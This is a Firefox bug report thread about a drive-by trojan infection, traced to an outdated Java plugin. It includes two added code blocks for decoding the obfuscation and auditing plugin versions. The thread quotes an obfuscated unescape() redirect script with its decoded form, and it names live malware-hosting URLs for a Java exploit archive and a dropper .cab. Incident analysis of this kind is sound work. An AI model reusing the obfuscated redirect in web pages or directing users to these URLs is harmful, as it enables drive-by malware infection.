Closed Bug 337768 Opened 18 years ago Closed 18 years ago

Active exploit that installs trojan on ff 1.5.3

Categories: Firefox :: Security, defect
Platform: x86, Windows XP
Type: defect
Priority: Not set
Severity: major
Status: RESOLVED INVALID
People: Reporter: rene, Unassigned
Attachments: 1 file

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3

Navigating to this URL with ff 1.5.3 will install one or multiple trojans; reason unknown, but the virus scanner alerts, placing arbitrary executables in the \windows\system32 directory. It redirects the user before or afterwards.
Reproducible on my system.

Reproducible: Always

Steps to Reproduce:
1. navigate to http://c-erotica.cumswap.net/ with ff 1.5.3
2. watch your virus scanner detect trojans.

Actual Results:  
AVG pops up offering to quarantine the trojan.

Expected Results:  
-

Accidental discovery, reproducible.
page loads:  http://teenboat.sexy-teen-girls-free-porn-pics.biz/src.js
contains:
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%3E%0D%0A%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%2D%6F%72%67%61%73%6D%2E%6F%72%67%2F%73%65%78%2E%68%74%6D%6C%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A'))
decodes as:
<script language='javascript'> window.location.href="http://www.e-orgasm.org/sex.html"; 
</script>
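The src.js quoted above hides a redirect behind a single document.write(unescape('...')) layer. The following is an added example, not code from the bug report or from Firefox: a small decoder that re-implements the percent-decoding unescape() performs (so the analyst never has to execute the script), peels off nested unescape() layers, and lists the location assignments found underneath. The sample input is constructed here, uses a placeholder domain rather than the site named in the report, and mixes encoded and literal characters, which the real sample also allows.

```javascript
// Added example (not from the bug report): decode the
// document.write(unescape('%3C...')) obfuscation layer seen in src.js
// and pull out the redirect target it hides. The sample below is
// constructed here and points at a placeholder domain.
const SAMPLE_SRC_JS =
  "document.write(unescape('%3C%73%63%72%69%70%74%3Ewindow.location.href%3D" +
  "%22http%3A%2F%2Flanding.example.invalid%2Fx.html%22%3B%3C%2F%73%63%72%69%70%74%3E'))";

// Re-implements the legacy unescape() so attacker-controlled script is
// never evaluated: %uXXXX -> UTF-16 code unit, %XX -> one byte, anything
// else passes through unchanged.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Returns the decoded string argument of every unescape('...') call.
function extractUnescapePayloads(js) {
  const out = [];
  const re = /unescape\(\s*(['"])((?:\\.|(?!\1)[^\n])*)\1\s*\)/g;
  let m;
  while ((m = re.exec(js)) !== null) out.push(decodeUnescape(m[2]));
  return out;
}

// Peels unescape() layers until none remain (nested layers are common)
// and collects every location / location.href assignment seen on the way.
function findRedirectTargets(js) {
  const targets = [];
  const pending = [js];
  while (pending.length) {
    const layer = pending.pop();
    pending.push(...extractUnescapePayloads(layer));
    const locRe = /(?:window|document|top|self|parent)?\.?location(?:\.href)?\s*=\s*(['"])([^'"]+)\1/g;
    let m;
    while ((m = locRe.exec(layer)) !== null) {
      if (!targets.includes(m[2])) targets.push(m[2]);
    }
  }
  return targets;
}

// Stand-alone run: print what the constructed sample redirects to.
console.log("redirect targets:", findRedirectTargets(SAMPLE_SRC_JS));
```

The decoder is deliberately not `eval`: the point of analysing a page like this is to learn where it sends the browser without letting it do so.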

Agreed, trojan also installs when going to http://www.e-orgasm.org/sex.html

I've made a log with ethereal, not sure where to put it.
René, can you type about:plugins into the url bar, do File->Save Page As (Web Page Complete), then attach the page here? thanks.
Attached file about:plugins
as requested
what are the names of the trojans?
Windows Defender didn't catch anything after loading http://www.e-orgasm.org/sex.html in the test I just ran.
According to the attachment in comment 4, you're using Java 1.4.1_03.  Bug 271559, filed in 2004, mentions active exploits against Java versions lower than 1.4.2_06.  I bet the site is exploiting a security hole in the old version of Java you have.

If you're feeling brave, want to disable/uninstall Java and try again, or update your Java VM and try again?
René, actually most of your plugins are out of date and have been superseded by later versions which incorporate fixes for security issues. Please update _all of your plugins_ as soon as possible, clean your system and try again.
Hi,

Well, I have 5 extensions installed (DOM Inspector, Talkback, Adblock, Stumbleupon, Live HTTP Headers). StumbleUpon was indeed out of date; I upgraded.

I checked the system with Hitman Pro; AVG is running, so the system should be clean.

Trojan horse name (one of them) is Dropper.Small.8.BT according to AVG.
Actually, I meant plugins. Hopefully I am up to date. To compare yours with mine:

yours: QuickTime Plug-in 7.0.3
mine:  QuickTime Plug-in 7.0.4

yours: Real 6.0.12.1465
mine:  Real 6.0.12.1483

yours: Shockwave Flash 8.0 r22
mine:  Shockwave Flash 8.0 r24

yours: Java Plug-in 1.4.1_03
mine:  Java Plug-in 1.5.0_06
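The comparison above is done by eye. As an added example (not code from the thread or from Firefox), the block below automates it: it parses about:plugins-style lines, normalises the three version styles that appear in this thread (dotted, underscored Java updates, and Flash's "rNN" revisions) into numeric keys, and flags anything below a minimum. The installed list is the reporter's as quoted above; the minimum table is constructed from the versions named in this thread (1.4.2_06 from the bug 271559 remark, the others from the comparison) and is not current vendor data.

```javascript
// Added example (not from the bug thread): audit an about:plugins list
// against minimum patched versions the way the comment above does by hand.
// INSTALLED_PLUGINS is the reporter's list as quoted in the thread;
// MINIMUM_VERSIONS is a constructed reference table built from versions
// named in the thread, not current vendor data.
const INSTALLED_PLUGINS = [
  "QuickTime Plug-in 7.0.3",
  "Real 6.0.12.1465",
  "Shockwave Flash 8.0 r22",
  "Java Plug-in 1.4.1_03",
];

const MINIMUM_VERSIONS = {
  "QuickTime": "7.1",          // thread: 7.0.4 is itself superseded by 7.1
  "Real": "6.0.12.1483",
  "Shockwave Flash": "8.0 r24",
  "Java": "1.4.2_06",          // thread: bug 271559, exploits below this
};

// Splits "Java Plug-in 1.4.1_03" into { name, version }; returns null for
// lines that carry no version (e.g. an extension name on its own).
function parsePluginLine(line) {
  const m = line.trim().match(/^(.*?)\s+(\d[\w.]*(?:\s+r\d+)?)$/);
  return m ? { name: m[1], version: m[2] } : null;
}

// "8.0 r22" -> [8,0,22], "1.4.1_03" -> [1,4,1,3]: every run of digits is
// one component, so dotted, underscored and "rNN" styles compare alike.
function versionKey(v) {
  return (v.match(/\d+/g) || []).map(Number);
}

// Numeric component-wise compare; a missing trailing component counts as 0,
// so "7.1" is newer than "7.0.3" and equal to "7.1.0".
function compareVersions(a, b) {
  const ka = versionKey(a), kb = versionKey(b);
  const n = Math.max(ka.length, kb.length);
  for (let i = 0; i < n; i++) {
    const x = ka[i] || 0, y = kb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// One finding per installed plugin that has an entry in the minimum table;
// plugins the table does not know are skipped rather than guessed at.
function auditPlugins(lines, minimums) {
  const findings = [];
  for (const line of lines) {
    const p = parsePluginLine(line);
    if (!p) continue;
    const key = Object.keys(minimums).find(k => p.name.toLowerCase().startsWith(k.toLowerCase()));
    if (!key) continue;
    findings.push({
      name: p.name,
      installed: p.version,
      required: minimums[key],
      outdated: compareVersions(p.version, minimums[key]) < 0,
    });
  }
  return findings;
}

// Stand-alone run: print the audit of the reporter's plugin list.
for (const f of auditPlugins(INSTALLED_PLUGINS, MINIMUM_VERSIONS)) {
  console.log(`${f.outdated ? "OUTDATED" : "ok      "} ${f.name}: ${f.installed} (need >= ${f.required})`);
}
```

All four of the reporter's plugins come out as outdated against that table, which matches the reviewer's conclusion; swapping in the Java 1.5.0_06 that was found installed later in the thread passes.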


crap, QuickTime 7.0.4 is now out of date, get the latest 7.1 from <http://www.apple.com/support/downloads/>.
www.e-orgasm.org/sex.html attempts to load lots of crap, which is generally how these "free" sites pay for themselves. Are you confident you can stay ahead of the hackers? Note that anti-virus won't save you: it only detects the bad stuff it has already discovered, which by definition means there's a window of time between when the bad guys start using a new trick and when the AV products start detecting it.

One thing it loads is detected as Trojan.ByteVerify (an old Java exploit, almost guaranteed to be present on these kinds of sites)
http://www.awmdabest.com/tjar/364/ns/archive.jar 

It also includes a script from http://install.xxxtoolbar.com/ that tries tons of tricks, mostly IE. Starting with a simple plea "Clean OK then Yes to Install" http://www.tbcode.com/ist/softwares/v4.0/0006_regular.cab -- no other reason given, just to see how gullible people are I guess.

xxxtoolbar.com has a flash movie called toolbarcash.swf with the associated text "For Easy Installation of SlotchBar". It scans clean, but I didn't run it to see what it tried to load into the associated iframe.

A couple more attempts run the tbcode.com ActiveX from above.

Loads an adultfriendfinder.com frame which looked safe as far as I could tell. heh: "The individuals appearing in this advertisement may not be actual Adult FriendFinder members." I'm sure they're not.

This looks like the old Java exploit (which is a downloader, the actual payload differs from site to site). I'm slightly suspicious of the flash since that's going around too, but this particular one seemed to scan clean.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Depends on: startpagewarning
Resolution: --- → INVALID
Disabling Java indeed stops the system from being infected. An outdated Java probably is the vector.

Which makes me wonder.. I am one of the users that nicely complies when some software mentions there is a new version, and have done so in the past several times for Java.

But.. at this very moment, Java (even when loaded with ff) does not mention an update; btw neither does Flash or QT. I am not sure how this mechanism is supposed to work (i.e. will the autoupdate only get triggered with ff running and having the plugin loaded?), and worse, I cannot find _any_ option to manually update Java, since it is not in the start menu, the tray icon that shows up after running some Java app isn't of help either, and the ff menu does not show any plugin config or 'check for updates' (besides the extensions), so apparently I am dependent on the auto-update mechanism of the plugin author?...

So, what steps were actually expected from me, as a user, to fix or prevent this? I am obviously missing something here. So far, my best solution is to just disable Java.
An addition to this Java thing: according to Control Panel/Software, J2SE RE 5.0 update 6 (1.5.0_06, right?) is nicely installed.

J2SE 1.4.1 seems _not_ installed; however, that appears to be the version launched with ff. I have updated ff in the past, several times, so probably this Java 1.4 just kept "sleeping".

I went to ff_install_dir\plugins\ and removed any DLL that had to do with Java. After an ff restart, Java 1.5 is indeed launched now (and the issue is solved).

So after all, the issue appears to be: the Java 1.4 plugin hanging around with ff, even after uninstall(?), and getting launched by default even if Java 1.5 is installed. Should I file a new bug report for that? ;)

Many thanks for the help from you guys, and I am glad it was not ff itself.
Looking at your plugin list it appears you have both Java 1.4.1_03 and Java 1.5.0_06 installed. I wonder if the Java 1.5.0 installer didn't clean out the old plugin version from Firefox's installation directory. That is not good.
Well, Java 1.5.0_06 is not in the plugins directory; I looked for it, and the DLLs (same names as the 1.41 ones I dropped from the plugin dir) are in "program files\java\jre1.5.0_06\bin".
Not sure how ff detects this, but I _think_ putting them in the plugins dir was the old method, and looking in the registry for the Java location is the new method. And (I think) plugins in the ff plugin directory apparently get priority over a Java installation in another directory. My current system is about 10 months old; afaik it only ran ff 1.0 and up, not 0.9.